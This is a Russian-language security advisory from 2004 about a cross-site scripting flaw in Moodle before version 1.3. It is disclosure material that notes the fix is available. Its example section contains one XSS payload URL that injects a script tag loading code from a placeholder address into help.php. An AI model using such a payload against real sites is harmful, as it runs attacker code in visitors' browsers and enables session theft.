Security Lab

Межсайтовый скриптинг в Moodle

Дата публикации:02.05.2004
Всего просмотров:1139
Опасность:
Низкая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Moodle 1.2.x
Уязвимые версии: Moodle до версии 1.3

Описание: Уязвимость обнаружена в Moodle. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

http://{some_moodle_site}/help.php?text=<script src={url_to_script_to_execute}></script>

URL производителя: http://www.moodle.org/

Решение:Установите обновленную версию программы: http://moodle.org/mod/resource/view.php?id=8

Ссылки: Cross Site Scripting in Moodle < 1.3